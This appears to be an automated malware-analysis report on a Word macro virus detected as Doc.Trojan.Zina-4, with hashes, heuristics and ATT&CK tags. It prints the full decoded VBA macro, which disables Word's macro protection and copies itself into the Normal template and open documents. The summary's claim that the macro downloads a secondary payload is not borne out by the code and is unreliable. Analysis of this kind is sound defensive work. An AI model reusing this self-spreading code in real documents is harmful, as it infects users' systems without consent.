Doc.Trojan.Zina-4 — Office (OLE) malware analysis

Static analysis result for SHA-256 6db1019b8c80cbd0…

MALICIOUS

Office (OLE)

33.0 KB Created: 1997-09-17 10:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: f4ccea01ab4ee9860cafbddeed86bf99 SHA-1: 970d4eacaa98f5c6ff3b84d80b57e5ed127295c6 SHA-256: 6db1019b8c80cbd013f2e9c293b3ffbebe990b5f7cedd51f9907529faceb3eb1
120 Risk Score

Malware Insights

Doc.Trojan.Zina-4 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a critical ClamAV detection for 'Doc.Trojan.Zina-4' and a high-severity heuristic for a Document_Open macro. The VBA macro code appears to be designed to execute upon opening the document, likely to download and execute a secondary payload. The presence of the Document_Open macro and the specific ClamAV signature strongly indicate a malicious document.

Heuristics 3

  • ClamAV: Doc.Trojan.Zina-4 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Zina-4
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1317 bytes
SHA-256: 1888dc515143524b2d1649d4f04230cadef906a5f19b19bf50c7176e10ae3b8a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

'String2K
Dim a23489245, b23489234, c76394729, d39848275, e72945601, f92038476
Dim g50385723, h84729645, i84729645, j40395423, k02391836, l20654583, m29387656
Dim n74359023, o09324687, p98734985, r90809564
Private Sub Document_Open()
Set a23489245 = Application.ActiveDocument: Set b23489234 = Application.NormalTemplate
Set c76394729 = ThisDocument: d39848275 = 1: Options.VirusProtection = (d39848275 - d39848275)
Set k02391836 = b23489234.VBProject.vbcomponents(d39848275).CodeModule
Set n74359023 = a23489245.VBProject.vbcomponents(d39848275).CodeModule
e72945601 = c76394729.VBProject.vbcomponents(d39848275).CodeModule.Lines(d39848275, _
c76394729.VBProject.vbcomponents(d39848275).CodeModule.countoflines)
If k02391836.Lines(d39848275, d39848275) <> "'String2K" Then
k02391836.deletelines d39848275, k02391836.countoflines
k02391836.addfromstring e72945601
End If
If n74359023.Lines(d39848275, d39848275) <> "'String2K" Then
n74359023.deletelines d39848275, n74359023.countoflines
n74359023.addfromstring e72945601
End If
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.